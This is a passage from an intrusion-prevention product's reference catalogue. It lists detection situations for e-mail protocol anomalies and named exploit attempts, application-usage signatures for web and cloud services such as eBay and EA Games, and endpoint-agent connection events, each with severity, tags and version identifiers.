Last changed: sgpkg-ips-106-2032
Description: An e-mail message header length exceeded the defined limit. Risk analysis: Risk level is low. Most relevant log fields: SRC and DST show the SMTP client and the server IP addresses.
Back to top

E-Mail_IMF-Too-Long-Header-Field

About this situation: An e-mail message header field length exceeded the defined limit.
Context: E-Mail Header Field Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An e-mail message header field length exceeded the defined limit. Risk analysis: Risk level is low. Very long header fields can be used in buffer overflow attacks. Most relevant log fields: SRC and DST show the e-mail client and the server IP addresses.
Back to top

E-Mail_IMF-Too-Long-MIME-Parameter-Name

About this situation: Too long MIME parameter name detected
Context: E-Mail Mime Parameter Name Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: A too long a MIME parameter name was detected in an e-mail message header. The message violates the defined length limits and/or Internet Message Format specification DESC_RFC(2822). Risk analysis: Risk level is low. Most relevant log fields: SRC and DST show the e-mail client and the server IP addresses.
Back to top

E-Mail_IMF-Too-Long-MIME-Subtype-Name

About this situation: Too long MIME subtype name was detected.
Context: E-Mail MIME Subtype Name Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: A too long a MIME subtype name was detected in an e-mail message header. The message violates the defined length limits and/or Internet Message Format specification DESC_RFC(2822). Risk analysis: Risk level is low. Most relevant log fields: SRC and DST show the e-mail client and the server IP addresses.
Back to top

E-Mail_Ipswitch-IMail-Server-Content-Type-BOF

About this situation: An attempt to exploit a vulnerability in Ipswitch iMail Server detected
Context: E-Mail Header Stream
Severity: 7
Tags: Windows, Any Hardware, IMail, CVE2007, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-395-4219
Vulnerability: Ipswitch-IMail-SMTP-Server-Content-Type-Header-Buffer-Overflow
Description:
Back to top

E-Mail_Ipswitch-IMail-Server-Mailing-List-Message-Subject-BOF

About this situation: An attempt to exploit a vulnerability in Ipswitch iMail Server detected
Context: E-Mail Header Stream
Severity: 7
Tags: Windows, Any Hardware, IMail, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Ipswitch-IMail-Server-Mailing-List-Message-Subject-BOF
Description:
Back to top

E-Mail_JPG-Gdiplus-DLL-Comment-Buffer-Overflow

About this situation: Detects jpeg images that will cause a buffer overflow in Windows gdiplus.dll
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, MS2004-09, CVE2004, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-10-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: JPG-Gdiplus-DLL-Comment-Buffer-Overflow
Description:
Back to top

E-Mail_Message-Id-Random

About this situation: A random string in the Message-ID header detected
Context: E-Mail Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-1334-5242
Last changed: sgpkg-ips-1334-5242
Description:
Back to top

E-Mail_Message-Syntax-Error

About this situation: E-mail message structure could not be understood
Context: E-mail without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-240-3038
Description: The E-mail message structure could not be parsed. This can be caused by a sender that does not follow the E-mail message structure specifications. As such, this situation is probably not very severe. However, this may affect further checks for the E-mail message, because the message structure is unclear.
Back to top

E-Mail_Message_Partial

About this situation: E-mail message specified message/partial content type
Context: E-mail without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An e-mail message specified a message/partial content type. Message/partial is used to split a single e-mail message into several e-mail messages that are sent separately over the network [RFC 2046]. The receiving e-mail application assembles the parts and shows the complete message to the user. Risk analysis: Risk level is fairly low. Partial messages can be used to evade some e-mail virus scanners.
Back to top

E-Mail_Microsoft-Outlook-Object-Security-Bypass-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook detected
Context: E-Mail Header Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, Microsoft Office, CVE2004, Windows not specific, Microsoft Office not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Outlook-Object-Security-Bypass-Vulnerability
Description:
Back to top

E-Mail_MIME-Version-Invalid

About this situation: Invalid MIME version detected in e-mail message
Context: E-mail without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An invalid MIME version was detected in an e-mail message. Only MIME version 1.0 [RFC 2045] is supported. The rest of the message is handled as if it were MIME 1.0. Risk analysis: Risk level is fairly low.
Back to top

E-Mail_Multidropper-Traffic

About this situation: A suspicious traffic pattern detected
Context: E-Mail Header Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.Downloader.Multidropper-Botnet
Description:
Back to top

E-Mail_Multipart-No-Valid-Boundary-String

About this situation: No valid boundary string specified for multipart e-mail message
Context: E-mail without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-240-3038
Description: No valid boundary string was specified for a multipart e-mail message. The message will be handled as if it only has one part. Risk analysis: Risk level is fairly low.
Back to top

E-Mail_Quoted-Printable-Syntax-Incorrect

About this situation: Quoted-printable encoding used incorrect syntax in e-mail message
Context: E-mail without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: Quoted-printable encoding used incorrect syntax in an e-mail message. The encoding does not follow the specification [RFC 2045]. It is uncertain how the recipient e-mail application will decode the message. As such, this situation is probably not very severe. However, this may affect further checks for the E-mail message, because it is unclear how the mail recipient software will decode the message.
Back to top

E-Mail_Suspicious-Header

About this situation: An attempt to exploit a vulnerability in an SMTP server
Context: E-Mail Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-567-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

E-Mail_Too-Many-Header-Fields

About this situation: The number of header fields in an e-mail message exceeds the defined limit.
Context: E-Mail Header Fields Count Limit
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: The number of header fields in an e-mail message exceeds the defined limit. Risk analysis: Risk level is low. Most relevant log fields: SRC and DST show the e-mail client and the server IP addresses.
Back to top

E-Mail_Too-Many-MIME-Parameter-Parts

About this situation: Too many parts were detected in a MIME parameter continuation.
Context: E-Mail MIME Parameter Parts Count Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Too many parts were detected in a MIME parameter continuation. The number of parts in a MIME parameter continuation in an e-mail message DESC_RFC(2231) exceeded the defined limit. Risk analysis: Risk level is low. Most relevant log fields: SRC and DST show the e-mail client and the server IP addresses.
Back to top

E-Mail_Zimbra-Collaboration-Suite-Cross-Site-Scripting-CVE-2018-6882

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration Suite detected
Context: E-Mail Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1594-5242
Last changed: sgpkg-ips-1594-5242
Vulnerability: Zimbra-Collaboration-Suite-Cross-Site-Scripting-CVE-2018-6882
Description:
Back to top

e-MDs

About this situation: Application e-MDs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: e-MDs is a developer of integrated electronic health records and practice management software for physician practices and enterprises.
Back to top

E-nable

About this situation: Application E-nable detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: E-nable - cloud-based field service application allowing scheduling of work orders to be dispatched to mobile workers.
Back to top

E-Online

About this situation: E! Online usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: E! Online is the online portal of E! Entertainment Television, an American television channel owned by NBCUniversal.
Back to top

e-SignLive

About this situation: e-SignLive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Description: e-SignLive is a cloud-based electronic signature service which allows users to electronically sign, send and manage documents online.
Back to top

E-storage

About this situation: Application E-storage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: E-storage - protect, share and access your files anytime, anywhere.
Back to top

E-Trade

About this situation: E-Trade usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1238-5242
Description: E-Trade usage detected. E-Trade is an online financial service site.
Back to top

e-Zest

About this situation: Application e-Zest detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: e-Zest is a customer focused and technology-driven company providing product engineering and enterprise software and application evelopment services that help clients in crafting holistic business value for software development efforts.
Back to top

e2Campus

About this situation: Application e2Campus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: e2Campus is a service by Omnilert, LLC. Omnilert develops and markets the leading unified mass notification systems for sending time-sensitive information to large groups of people. With e2Campus, a single person can communicate important information to thousands of people anywhere, anytime, on any device.
Back to top

e2open

About this situation: Application e2open detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: E2open is provider of cloud-based, on-demand software solutions enabling enterprises to procure, manufacture, sell, and distribute products more efficiently through collaborative planning and execution across global trading networks.
Back to top

E3-EMIS

About this situation: Application E3-EMIS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: E3 EMIS Provides the tools your staff needs to predict, plan for, monitor and report on your organization's EHandS performance metrics.
Back to top

EA-Games

About this situation: Electornic Arts games traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-788-5211
Description: Electronic Arts, also known as EA Games, is an American developer, marketer, publisher and distributor of video games.
Back to top

EA-Origin

About this situation: Electronic Arts Origin traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1151-5242
Description: Electronic Arts Origin online gaming client usage has been detected.
Back to top

EA-The-Simpsons-Tapped-Out

About this situation: Electornic Arts' Simpsons game traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-788-5211
Last changed: sgpkg-ips-788-5211
Description: The Simpsons Tapped Out is a game developed by Electronic Arts. It is based on the characters of The Simpson television series.
Back to top

eAdjudication

About this situation: Application eAdjudication detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ethical eAdjudication for Clinical Endpoint Adjudication is a GxP managed Software Service based on a Cloud Portal designed to support Study Leaders, Committee Members and the Q.A. Staff across the central review and adjudication of subjective endpoints.
Back to top

EADOC

About this situation: Application EADOC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EADOC provides a fast, secure, easy to use web based construction management application. EADOC connects facility owners, construction managers, contractors, architects, sub consultants, sub contractors and suppliers together so they can securely share and exchange construction project information electronically.
Back to top

Eagleinvsys

About this situation: Application Eagleinvsys detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Eagle Investment Systems provides quality and data management, investment accounting and performance measurement solutions to support today's global financial services industry.
Back to top

Eagleview

About this situation: Application Eagleview detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EagleView Technology Corporation is the provider of aerial imagery, data analytics and GIS solutions serving the commercial, government and public utility sectors. The company's patented image capture processes and 3D modeling algorithms coupled with property-centric analytic tools empower end-user workflows with scalable, efficient and highly accurate answer sets in support of property claims, risk management, construction, emergency response, assessment, corridor mapping and more.
Back to top

EARLIZ

About this situation: Application EARLIZ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Earliz is a SaaS collaborative project management platform, for professional and independent users, providing management tools, such as Kanban, Scrum and Agile.
Back to top

Earthcam

About this situation: EarthCam usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: EarthCam also provides a search engine of internet cameras. Source: EarthCam
Back to top

EarthLink

About this situation: Application EarthLink detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EarthLink provides managed network, security and cloud solutions for multi-location businesses. It do it by building and managing MPLS WAN networks, by providing virtualized infrastructure, security, hosted voice, secure WiFi and compliance solutions, and by offering customer care.
Back to top

Easel.ly

About this situation: Application Easel.ly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Easel.ly is web tool that empowers anyone to create and share powerful visualsm infographics and posters.
Back to top

EaseUS-Todo-Backup

About this situation: Application EaseUS-Todo-Backup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EaseUS software, specializing in data backup, Windows PC/Server backup and SQL/Exchange Server backup.
Back to top

EasiAdmin

About this situation: Application EasiAdmin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Certent - comprehensive cloud-based SaaS solutions for equity compensation management, equity compensation reporting and disclosure management.
Back to top

Easy

About this situation: Application Easy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EASY ENTERPRISE provides a full ECM suite including advanced tools for all types of electronic and paper based content to encourage collaboration and business process improvement
Back to top

Easy-Commission

About this situation: Application Easy-Commission detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Easy-Commission is a cloud based commission solution that allows companies to set up their sales commission plans and share the results with their reps.
Back to top

Easy-Insight

About this situation: Application Easy-Insight detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Easy Insight offers an innovative new business intelligence product through a Software as a Service model. A polished, intuitive user interface enables individual users and businesses.
Back to top

Easy-Projects

About this situation: Easy Projects usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-629-5211
Description: This software allows users manage projects through a web browser interface. It provides project management and collaboration functionality, including configurable dashboards, integrated reporting, message boards, issue and request tracking, statistics, email notifications, and Gantt charts. Source: Wikipedia
Back to top

Easy-Share

About this situation: EASY SHARE usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

Easy-WebContent

About this situation: Application Easy-WebContent detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Easy WebContent - Site Builder web service.
Back to top

EasyBib

About this situation: Application EasyBib detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EasyBib.com, provides research, citation, and note taking tools.
Back to top

EasyDNS

About this situation: Application EasyDNS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: easyDNS Technologies an Internet Service Provider which supplies DNS and web hosting services.
Back to top

Easygrouper

About this situation: Application Easygrouper detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EasyGrouper, an Employee Contact List and Directory Tool.
Back to top

Easymatch

About this situation: Application Easymatch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Easymatch is a cloud based estate agency software designed to grow your business faster.
Back to top

Easymessenger

About this situation: easymessenger usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based messenger service that works with MSN, ICQ, AIM, Yahoo!, and Jabber; Source EasyMessenger
Back to top

Easynews

About this situation: Application Easynews detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Easynews is web-based usenet service . Easynews, Inc is a Usenet
Back to top

Easypromos

About this situation: Application Easypromos detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Easypromos is an application specialized in creating promotions and contests on any Facebook page.
Back to top

EasyRevu

About this situation: Application EasyRevu detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GoodRevu gives business owners, HR leaders and evaluation process managers tools for managing a performance evaluation cycle.
Back to top

Easyvista

About this situation: Application Easyvista detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EasyVista provide consumerized service management solutions for mid to large-sized enterprises. EasyVista provide modern CIOs bring consumerized services to market quickly, allowing them to embrace the social, shifting, flattening and emergent realities of today's digital enterprise.
Back to top

Eater

About this situation: Eater usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1764-5242
Description: Eater usage detected. Eater is a food and eating related online-magazine by Vox Media.
Back to top

EatherWay

About this situation: Application EatherWay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EatherWay is medical appointment scheduling system which integrates three communication media - Mobile Text Messages (sms), Internet and normal Telephony.
Back to top

EazeWork

About this situation: Application EazeWork detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EazeWork's Sales management application (EazeSales) is a web based Software as a Sevice (SaaS) solution. EazeSales is designed for the Sales team and provides features which a typical Small and Medium Enterprise requires.
Back to top

eazyBI

About this situation: Application eazyBI detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eazyBI is easy-to-use business intelligence as a service application. Upload any data or connect to existing data source and within minutes start data analysis.
Back to top

Eazyweb

About this situation: Application Eazyweb detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Eazyweb specialise in the design, development and support of business websites which are editable by a robust website maintenance solution called eazyCMS.
Back to top

eBay

About this situation: eBay usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-788-5211
Description: eBay Inc. is an American Internet company that manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide.
Back to top

eBillity-Time-Tracker

About this situation: Application eBillity-Time-Tracker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eBillity is a time tracking software that lets enter time from any device. Track team's hours and instantly sync approved time entries to QuickBooks for billing and payroll.
Back to top

Ebix

About this situation: Application Ebix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ebix is a supplier of software and e-commerce solutions to the insurance industry. Ebix provides a series of application software products for the insurance industry ranging from carrier systems, agency systems and exchanges to custom software development for all entities involved in the insurance and financial industries.
Back to top

eBiz-Tax-Center

About this situation: Application eBiz-Tax-Center detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ebiz offers file sales, use, occupation privilege, facilities development admissions and telecommunications business taxes online.
Back to top

eBLVD-Online-Meetings

About this situation: Application eBLVD-Online-Meetings detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eBLVD is a cloud-based web conferencing service that allows you to present, collaborate, and share.
Back to top

Ebookers

About this situation: Ebookers usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-630-5211
Description: Ebookers.com is an online travel company based in the UK.
Back to top

EBSCO-Host

About this situation: Application EBSCO-Host detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EBSCO Host is research database, discovery service providing scholarly journals, full-text articles, magazines, e-books for Academic, Medical, Corporate, School, Library, and Government research.
Back to top

Ebsuite

About this situation: EBsuite usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

eBuddy

About this situation: eBuddy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-628-5211
Description: eBuddy is a web and mobile messenger which supports various instant messaging services.
Back to top

ec12

About this situation: Application ec12 detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The EC-12 is a restricted design radio controlled model yacht class with fiberglass hulls made from near identical molds and otherwise restricted to similar construction. The result is a class of boats with similar speed potential. The goal, as in any good one-design class, is to have the skipper's tuning, tactics, and boat handling abilities determine the outcome.
Back to top

ECA

About this situation: Application ECA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ECA-international- is the development and provision of solutions for the management and assignment of employees around the world.
Back to top

ECA Certificate expires soon

About this situation: The ECA certificate expires soon. Check if the ECA certificate has been renewed.
Context: Management Server situation
Severity: 3
Tags: Upcoming Events
First detected in: sgpkg-ips-1423-5242
Last changed: sgpkg-ips-1535-5242
Description:
Back to top

ECA Certificate has expired

About this situation: The ECA certificate has expired. Check if the ECA certificate has been renewed.
Context: Management Server situation
Severity: 7
Tags: SMC
First detected in: sgpkg-ips-1423-5242
Last changed: sgpkg-ips-1423-5242
Description:
Back to top

ECA-SetupHost.exe

About this situation: Endpoint Context Agent based SetupHost.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Description: SetupHost.exe endpoint application was detected. SetupHost.exe is an installer service.
Back to top

ECABinaryChecksumSHA256 3080193

About this situation:
Context: ECA Binary SHA256 Checksum
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1843-5242
Description:
Back to top

ECABinaryChecksumSHA256 3080194

About this situation:
Context: ECA Binary SHA256 Checksum
Severity: 1
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Description:
Back to top

ECABinaryChecksumSHA256 3080195

About this situation:
Context: ECA Binary SHA256 Checksum
Severity: 1
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Description:
Back to top

ECABinaryChecksumSHA512 3145729

About this situation:
Context: ECA Binary SHA512 Checksum
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

eCarList

About this situation: Application eCarList detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eCarList, LLC provides Web-based inventory management and distribution platform, vehicle pricing analytics, and search and marketing solutions for car dealers in the United States.
Back to top

ECA_Comm_handshake_error

About this situation: Error in connection handshake.
Context: ECA
Severity: 2
Tags: Endpoint
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-983-5242
Description: A ECA connection could not be accepted due to a handshake error.
Back to top

ECA_Comm_transport_error

About this situation: Transport error in metadata connection.
Context: ECA
Severity: 2
Tags: Endpoint
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-983-5242
Description: A transport error was encountered in a metadata connection.
Back to top

ECA_Endpoint_changed

About this situation: ECA Metadata end-point changed.
Context: ECA
Severity: 1
Tags: Endpoint
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-983-5242
Description: A metadata end-point had attributes changed, which requires a restart of the end-point
Back to top

ECA_Endpoint_down

About this situation: ECA Metadata end-point torn down.
Context: ECA
Severity: 1
Tags: Endpoint
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-983-5242
Description: A metadata end-point was torn down.
Back to top

ECA_Endpoint_up

About this situation: ECA Metadata end-point up.
Context: ECA
Severity: 1
Tags: Endpoint
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-983-5242
Description: A metadata end-point was created.
Back to top

ECA_Metadata_connected

About this situation: ECA metadata connection established.
Context: ECA
Severity: 1
Tags: Endpoint
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-983-5242
Description: A metadata connection was established.
Back to top

ECA_Metadata_connection_disconnected

About this situation: Metadata connection disconnected
Context: ECA
Severity: 1
Tags: Endpoint
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-983-5242
Description: A metadata connection was disconnected.
Back to top

ECA_Metadata_field_missing

About this situation: Mandatory metadata fields missing.
Context: ECA
Severity: 2
Tags: Endpoint
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-983-5242
Description: Mandatory metadata fields missing.
Back to top

ECA_Metadata_listening_socket

About this situation: Client started a listening socket.
Context: ECA
Severity: 1
Tags: Endpoint
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-983-5242
Description: A client started a listening socket.
Back to top

ECA_Metadata_login

About this situation: Metadata login received
Context: ECA
Severity: 1
Tags: Endpoint
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-983-5242
Description: A login event was received from a metadata connection.
Back to top

ECA_Metadata_logout

About this situation: Metadata logout received
Context: ECA
Severity: 1
Tags: Endpoint
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-983-5242
Description: A logout event was received from a metadata connection.
Back to top

ECA_Metadata_syntax_error

About this situation: Syntax error in metadata
Context: ECA
Severity: 2
Tags: Endpoint
